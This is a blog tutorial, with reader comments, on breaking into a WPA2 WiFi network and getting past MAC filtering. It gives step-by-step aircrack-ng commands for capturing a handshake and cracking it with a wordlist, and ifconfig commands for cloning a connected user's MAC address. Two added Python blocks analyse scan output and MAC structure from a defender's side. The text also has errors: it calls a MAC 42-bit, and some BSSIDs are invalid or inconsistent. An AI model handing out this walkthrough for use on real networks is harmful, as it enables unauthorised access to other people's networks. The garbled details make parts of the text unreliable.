Hacking a WiFi Network with MAC Filtering Enabled

September 21, 2015


Don’t try this on networks on which you lack permission for penetration testing.


Intro:

MAC:

“MAC is a 42 bit address used to uniquely identify a device.”

“MAC filtering is a way in which the network administrator allows only specific MAC addresses to connect to the router.”


Let’s divide this topic into two parts:

[-] Crack a WiFi network.

[-] Get into it even if MAC filtering is enabled.


Tools:

1-Kali Linux

Rather than downloading these separately and spending your time configuring the tools, download “Kali Linux”, because it’s the mother of all possible tools available out there.

2-Wireless card capable of monitoring


If you have both, then let’s start:

Crack a WiFi network:

First disconnect all wireless connections.

Open your terminal:

Command: airmon-ng start [your WLAN card]

If you don’t know the name of your WLAN card, open a terminal, type ifconfig and check the name there; all network adapters will be listed.

It is usually “wlan0”, so let’s use wlan0 as the network card name.

Type: airmon-ng start wlan0

Hit Enter.

It will print something like this:

Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
  661 NetworkManager
  763 wpa_supplicant
 1032 avahi-daemon
 1036 avahi-daemon
10136 dhclient
10295 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation Centrino Advanced-N 6200 (rev 35)
		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

Now, your network card is in monitor state.

You can see that monitor mode is enabled on “wlan0mon”.

Command: airodump-ng [monitor interface]

As our monitor interface is "wlan0mon"

Type : airodump-ng wlan0mon

If it gives an error like:

ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0mon <#>'
Sysfs injection support was not found either.

Then use these three commands to correct this and run the above command again:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Now you can see all WiFi networks in your range. Wait for your desired WiFi network to be shown, then hit Ctrl+C. Don’t close or clear the terminal; you need some info from it.

It will be like this:
 CH  7 ][ Elapsed: 24 s ][ 2015-09-20 04:02

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 1C:sB:25:4F:93:F3  -44       27        0    0  11  54   WPA2 CCMP   PSK  neibour
 30:B9:21:FB:5E:DB  -64       19        0    0   1  54e  WPA  CCMP   PSK  Hoes
 58:3A:35:6A:60:31  -83       27        0    0   8  54e  WPA2 CCMP   PSK  club
 3A:6C:F5:4E:68:AB  -87        9        0    0   1  54e. WPA2 CCMP   PSK  public

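As an added example (not code from the original post), here is a small Python parser for the access-point table printed above, the kind of thing a defender uses to inventory what is in range and flag networks that are below WPA2-CCMP. It is fed the four lines as printed on this page, so the first BSSID, which contains a non-hex character, is rejected by the address check; it assumes the AP-table layout shown here, with every column populated (the STATION table later on has different columns).

```python
import re
from dataclasses import dataclass

# Constructed sample: the AP table from the scan above, copied as printed on
# the page (note the non-hex "s" in the first BSSID).
SCAN_OUTPUT = """\
 CH  7 ][ Elapsed: 24 s ][ 2015-09-20 04:02

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 1C:sB:25:4F:93:F3  -44       27        0    0  11  54   WPA2 CCMP   PSK  neibour
 30:B9:21:FB:5E:DB  -64       19        0    0   1  54e  WPA  CCMP   PSK  Hoes
 58:3A:35:6A:60:31  -83       27        0    0   8  54e  WPA2 CCMP   PSK  club
 3A:6C:F5:4E:68:AB  -87        9        0    0   1  54e. WPA2 CCMP   PSK  public
"""

# A MAC address is six octets (48 bits) written as colon-separated hex pairs.
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")

@dataclass
class AccessPoint:
    bssid: str
    power: int      # PWR column, dBm
    channel: int    # CH column
    enc: str        # ENC column: WPA2, WPA, WEP, OPN ...
    cipher: str     # CIPHER column
    auth: str       # AUTH column
    essid: str

def parse_ap_table(text):
    """Return (access_points, rejected_lines) parsed from airodump-ng AP output."""
    aps, rejected = [], []
    for line in text.splitlines():
        fields = line.split(None, 10)   # at most 11 fields, keeps spaces in the ESSID
        if len(fields) < 11 or fields[0] == "BSSID":
            continue                     # banner, header or blank line
        if not MAC_RE.match(fields[0]):
            rejected.append(line.strip())   # malformed BSSID: keep it for review
            continue
        aps.append(AccessPoint(fields[0].upper(), int(fields[1]), int(fields[5]),
                               fields[7], fields[8], fields[9], fields[10].strip()))
    return aps, rejected

def weak_networks(aps):
    """Flag APs whose link security is below WPA2 with CCMP (open, WEP, WPA1, TKIP)."""
    return [ap for ap in aps if ap.enc not in ("WPA2", "WPA3") or ap.cipher != "CCMP"]
```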

The next command is: airodump-ng --bssid [MAC of router] -c [channel] --write [output file name] [monitor interface]

Get the MAC and channel info of your target network from the output of the airodump-ng wlan0mon command.


Let’s penetrate neibour:

airodump-ng --bssid 1C:sB:25:4F:93:F3 -c 11 --write WPAcrack wlan0mon

Hit Enter.

It will look like:

 CH 11 ][ Elapsed: 1 min ][ 2015-09-20 04:10

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E

 1C:sB:25:4F:93:F3  -44 100      716       95    0  11  54   WPA2 CCMP   PSK  B

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 1C:sB:25:4F:93:F3  18:87:96:11:9B:A8  -30    1 -54      0        6
 1C:sB:25:4F:93:F3  70:0B:C0:5F:68:56  -67   18 - 1      0       48
 1C:sB:25:4F:93:F3  34:23:BA:28:B5:0E  -68    1 -11      0        5
 1C:sB:25:4F:93:F3  44:91:DB:A5:66:78  -81   11 - 1      0       30


Now, wait for the “hand shake” text to appear on the terminal.

Congrats! You now have the password hashes, and it’s time to crack them. You’ll get the password in plain text form; be sure to use your best word list, because this all depends on your word list.

Open another terminal and don’t close the previous one, as we need some info from it.

Command: aircrack-ng [captured password hash file name] -w [word list]

Type: aircrack-ng WPAcrack-01.cap -w wordlist.txt


Now, pray.

If your prayer and the wordlist worked, you have the password. Now, log in to the WiFi.


At this point, you might have this question:

Q) Holy crab, what’s that authentication problem??? What should I do now??

A) You have to be cool.

This means the MAC filtering is enabled.


Get into it even if MAC filtering is enabled:

 CH 11 ][ Elapsed: 1 min ][ 2015-09-20 04:10

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E

 2C:AB:25:4F:93:F3  -44 100      716       95    0  11  54   WPA2 CCMP   PSK  B

Navigate to the output of the “airodump-ng --bssid 10:AB:25:4F:93:F3 -c 11 --write WPAcrack wlan0mon” command; you can see MAC addresses under “STATION”:

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 1C:sB:25:4F:93:F3  18:87:96:11:9B:A8  -30    1 -54      0        6
 1C:sB:25:4F:93:F3  70:0B:C0:5F:68:56  -67   18 - 1      0       48
 1C:sB:25:4F:93:F3  34:23:BA:28:B5:0E  -68    1 -11      0        5
 1C:sB:25:4F:93:F3  44:91:DB:A5:66:78  -81   11 - 1      0       30

Do you see ’em?

These are the MAC addresses of users connected to the network.


Now, you might be thinking:

Q) So, let’s cool it?? :/

A) If you are thinking this, then it’s time to use brain.py xD. These MAC addresses are allowed to connect to the network. If you have one of these MAC addresses, the MAC filter will not block you.

Time to clone xD

Open terminal:

Command 1: ifconfig wlan0 down

Command 2: ifconfig wlan0 hw ether [desired MAC address]

Command 3: ifconfig wlan0 up

Choose one of the MAC addresses from the STATION column of the output. Let’s use 34:23:BA:28:B5:0E.

And type:

Command 1: ifconfig wlan0 down

Command 2: ifconfig wlan0 hw ether 34:23:BA:28:B5:0E

Command 3: ifconfig wlan0 up

Type: ifconfig to confirm that your MAC has changed.
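As an added example (not code from the original post), the following Python decodes the structure of a 48-bit MAC address to show exactly what a MAC filter compares, using the cloned address 34:23:BA:28:B5:0E from the steps above. From the defender’s side it also shows why the common “locally administered bit” heuristic used by wireless IDS tools does not catch a copied address: the clone carries the owner’s vendor OUI and its globally administered bit unchanged, so nothing short of per-user authentication (for example WPA2-Enterprise with 802.1X) ties access to a credential rather than to an address.

```python
# Added example, not part of the original post: decode a 48-bit MAC address
# (six octets) to see what a MAC filter actually sees.

def parse_mac(mac):
    """Return the six octets of a colon-separated MAC; raise ValueError if malformed."""
    parts = mac.split(":")
    if len(parts) != 6 or any(len(p) != 2 for p in parts):
        raise ValueError(f"malformed MAC address: {mac}")
    return [int(p, 16) for p in parts]   # int() rejects non-hex digits such as 's'

def canonical(mac):
    """Normalise case so 'aa:bb' and 'AA:BB' compare equal, as a filter must."""
    return ":".join(f"{o:02X}" for o in parse_mac(mac))

def describe_mac(mac):
    """Split a MAC into the IEEE 802 fields: OUI plus the I/G and U/L bits."""
    octets = parse_mac(mac)
    return {
        "oui": ":".join(f"{o:02X}" for o in octets[:3]),   # vendor prefix, first 24 bits
        "multicast": bool(octets[0] & 0x01),                # I/G bit: 0 = unicast
        "locally_administered": bool(octets[0] & 0x02),     # U/L bit: 1 = not vendor-assigned
    }

def mac_filter_allows(allowlist, presented):
    """A MAC filter is only a set lookup on the address a client claims."""
    return canonical(presented) in {canonical(m) for m in allowlist}

def looks_spoofed(mac):
    """WIDS heuristic: flag locally administered unicast addresses.
    A cloned real address keeps the owner's OUI and U/L bit, so it passes this check."""
    d = describe_mac(mac)
    return d["locally_administered"] and not d["multicast"]

# Constructed allowlist: the STATION column from the capture shown above.
ALLOWED_STATIONS = ["18:87:96:11:9B:A8", "70:0B:C0:5F:68:56",
                    "34:23:BA:28:B5:0E", "44:91:DB:A5:66:78"]
```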


Now??

Now what man just connected already xD?

55 Comments
  1. Thumbs up!!

  2. Will it work in Windows? Or is there any software that has the same capability for Windows 10? *just curious tho

  3. I love this guide and I am happy to have found it! This guide expresses penetration testing for MAC address filtering with a password, but I was wondering what the steps would be to enter a WiFi network that doesn’t have a password but only MAC address filtering? I’m sure it would be similar and not hard to do at all. I tried to set my laptop’s wireless device to a MAC address that is registered to the network but I would get blue screens unless I disabled it. Thanks for the awesome guide!

  4. airodump-ng --bssid 1C:sB:25:4F:93:F3 -c 11 --write WPAcrack wlan0mon: where do I use this command? There is no space to write a command… will it be written in a new terminal window?? But there it shows an error. I am using live Kali amd64.
